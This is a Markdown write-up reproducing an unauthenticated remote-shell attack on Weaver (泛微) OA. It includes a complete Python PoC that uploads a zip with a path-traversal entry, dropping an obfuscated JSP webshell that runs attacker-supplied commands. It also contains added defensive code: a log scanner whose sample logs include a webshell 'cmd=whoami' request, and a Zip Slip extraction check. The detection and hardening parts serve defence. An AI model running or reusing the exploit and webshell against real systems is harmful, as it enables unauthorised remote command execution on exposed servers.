泛微 OA 前台 GetShell 复现.md (2.53 KB / 2021-05-21 09:14:38)
# 泛微 (Weaver) OA Unauthenticated GetShell Reproduction

Vulnerable path:

/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

If a direct, unauthenticated request to this path returns status code 200, the target is in most cases vulnerable. The 200 is only a fingerprint; the upload step below is what confirms it.

Build a zip archive whose entry name contains `../` components and upload it to the path above: the server unpacks the archive without normalizing the entry name, so the JSP escapes the extraction directory and is served from `/cloudstore/<name>.jsp`.
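The fingerprint above, and the drop location the PoC checks afterwards, are also what a defender would hunt for in web server logs. The following is an added example, not part of the original write-up or of the referenced post: it parses access-log lines in combined log format, flags requests to the Service_CheckApp/validateApp dispatch and any `.jsp` served straight from `/cloudstore/`, and correlates both per client IP. The log lines, IP addresses and the shell name `k3Xz9QpL.jsp` are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined format); not taken from any real host.
SAMPLE_LOG = """\
10.0.0.5 - - [21/May/2021:09:10:01 +0800] "GET /login/Login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [21/May/2021:09:14:02 +0800] "GET /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
198.51.100.7 - - [21/May/2021:09:14:03 +0800] "POST /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
198.51.100.7 - - [21/May/2021:09:14:04 +0800] "GET /cloudstore/k3Xz9QpL.jsp HTTP/1.1" 200 12 "-" "python-requests/2.25.1"
198.51.100.7 - - [21/May/2021:09:14:20 +0800] "GET /cloudstore/k3Xz9QpL.jsp?cmd=whoami HTTP/1.1" 200 40 "-" "curl/7.68.0"
10.0.0.9 - - [21/May/2021:09:15:00 +0800] "GET /cloudstore/index.html HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Indicators taken from the page: the dispatcher path and class, and the drop directory.
VULN_PATH = "/weaver/weaver.common.Ctrl/.css"
VULN_CLASS = "com.cloudstore.api.service.Service_CheckApp"
JSP_UNDER_CLOUDSTORE = re.compile(r"^/cloudstore/[^/]+\.jsp$", re.IGNORECASE)


def classify(line):
    """Return (rule, detail) tuples for one access-log line, or [] if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = unquote(m.group("target"))  # decode %2e%2e-style obfuscation before matching
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    hits = []
    # Rule 1: the vulnerable controller reached with the Service_CheckApp dispatch.
    # A GET is the fingerprint probe, a POST is the archive upload.
    if parts.path == VULN_PATH and qs.get("arg0", [""])[0] == VULN_CLASS:
        kind = "upload" if m.group("method") == "POST" else "probe"
        hits.append(("weaver_checkapp_" + kind, target))
    # Rule 2: a .jsp served directly out of /cloudstore/ (where the PoC expects its shell),
    # with or without the cmd= parameter the sample shell reads.
    if JSP_UNDER_CLOUDSTORE.match(parts.path):
        kind = "webshell_cmd" if "cmd" in qs else "webshell_access"
        hits.append(("cloudstore_" + kind, parts.path))
    return hits


def scan(log_text):
    """Group hits per client IP; an upload POST followed by a /cloudstore/*.jsp request is the full chain."""
    by_ip = {}
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            ip = LOG_RE.match(line).group("ip")
            by_ip.setdefault(ip, []).extend(hits)
    chains = []
    for ip, events in by_ip.items():
        rules = [r for r, _ in events]
        if "weaver_checkapp_upload" in rules and any(r.startswith("cloudstore_webshell") for r in rules):
            chains.append(ip)
    return by_ip, chains


if __name__ == "__main__":
    hits, chains = scan(SAMPLE_LOG)
    for ip, events in hits.items():
        for rule, detail in events:
            print(ip, rule, detail)
    print("full exploit chain from:", chains)
```

Rule 1 on its own is noisy only if the application legitimately calls this dispatch from the UI; the correlation in `scan` (upload POST plus a new `.jsp` under `/cloudstore/` from the same client) is the signal worth alerting on.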
    
PoC.py:

```py
import zipfile
import random
import sys
import requests


def generate_random_str(randomlength=16):
    """Random alphanumeric name so the dropped file is not a fixed, guessable string."""
    random_str = ''
    base_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    length = len(base_str) - 1
    for i in range(randomlength):
        random_str += base_str[random.randint(0, length)]
    return random_str

mm = generate_random_str(8)

webshell_name1 = mm + '.jsp'
# Zip entry name with '../' components: the server extracts it verbatim (Zip Slip),
# so the JSP lands three directories above the extraction directory, under /cloudstore/.
webshell_name2 = '../../../' + webshell_name1

def file_zip():
    # Note: sun.misc.BASE64Decoder was removed in Java 9, so this shell only compiles on Java 8 or older.
    shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
    if(request.getParameter("cmd")!=null){
        BASE64Decoder decoder = new BASE64Decoder();
        Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
        Process e = (Process)
                rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                        String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                        Object[]{}), request.getParameter("cmd") );
        java.io.InputStream in = e.getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            // print only the bytes read this round, not the whole 2048-byte buffer
            out.println(new String(b, 0, a));
        }
        out.print("</pre>");
    }
%>
    """   ## replace the shell body as needed
    # Close the archive explicitly so the central directory is written before the upload.
    with zipfile.ZipFile(mm + '.zip', mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(webshell_name2, shell)

def GetShell(urllist):
    file_zip()
    print('Uploading file')
    urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
    with open(mm + '.zip', 'rb') as fh:
        file = [('file1', (mm + '.zip', fh, 'application/zip'))]
        requests.post(url=urls, files=file, timeout=60, verify=False)
    # The traversal entry should now be served from the cloudstore web root.
    GetShellurl = urllist + '/cloudstore/' + webshell_name1
    GetShelllist = requests.get(url=GetShellurl, timeout=60, verify=False)
    if GetShelllist.status_code == 200:
        print('Exploit succeeded, webshell URL: ' + GetShellurl)
    else:
        print('Webshell not found, exploit failed')

def main():
    if len(sys.argv) == 2:
        url = sys.argv[1].rstrip('/')
        GetShell(url)
    else:
        print("usage: python3 %s http://xx.xx.xx.xx" % sys.argv[0])

if __name__ == '__main__':
    main()

```
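The root cause the PoC relies on is that the entry name inside the uploaded zip is used verbatim when the archive is unpacked (Zip Slip). The page does not show Weaver's server-side extraction code, so the following is an added example of the generic check and not the vendor's code: it builds archives in memory the way the PoC does, lists every entry that would resolve outside the extraction directory, and refuses the whole archive if any entry does. The directory layout under a temporary directory is hypothetical.

```python
import io
import os
import tempfile
import zipfile


def build_zip(entry_name, payload=b"<% out.println(1); %>"):
    """Build a one-entry zip in memory; the entry name is whatever the caller passes (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, payload)
    return buf.getvalue()


def unsafe_entries(zip_bytes, dest_dir):
    """Return the entry names that would land outside dest_dir if extracted naively."""
    dest = os.path.realpath(dest_dir)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")
            # Absolute names and drive-letter names are rejected outright;
            # '..' components are caught by resolving the path and comparing prefixes.
            if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
                bad.append(info.filename)
                continue
            target = os.path.realpath(os.path.join(dest, name))
            if os.path.commonpath([dest, target]) != dest:
                bad.append(info.filename)
    return bad


def safe_extract(zip_bytes, dest_dir):
    """Check every entry first; extract nothing if any entry escapes dest_dir."""
    bad = unsafe_entries(zip_bytes, dest_dir)
    if bad:
        raise ValueError("refusing archive with traversal entries: %r" % bad)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest_dir, info.filename)
            os.makedirs(os.path.dirname(target) or dest_dir, exist_ok=True)
            if not info.is_dir():
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
    return sorted(os.listdir(dest_dir))


def demo():
    """Run the check on a PoC-style archive and a clean one inside a scratch directory."""
    with tempfile.TemporaryDirectory() as tmp:
        # Hypothetical stand-in for the application's upload directory, three levels below tmp.
        store = os.path.join(tmp, "webapps", "cloudstore", "upload")
        os.makedirs(store)
        hostile = build_zip("../../../shell.jsp")          # the PoC's entry shape
        backslash = build_zip("..\\..\\..\\..\\shell.jsp")  # same idea with Windows separators
        clean = build_zip("app/manifest.txt", b"ok")
        result = {
            "hostile_flagged": unsafe_entries(hostile, store),
            "backslash_flagged": len(unsafe_entries(backslash, store)),
            "clean_flagged": unsafe_entries(clean, store),
        }
        try:
            safe_extract(hostile, store)
            result["hostile_extracted"] = True
        except ValueError:
            result["hostile_extracted"] = False
        result["clean_extracted"] = safe_extract(clean, store)
        return result


if __name__ == "__main__":
    print(demo())
```

The comparison is done on the resolved (`realpath`) target against the resolved destination, so symlinked upload directories and mixed separators do not bypass it. Note that Python's own `ZipFile.extractall` already strips leading `..` components, which is why the check has to be written explicitly rather than relying on whatever the extraction library happens to do.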
    
Ref:

https://www.cnblogs.com/nul1/p/14749353.html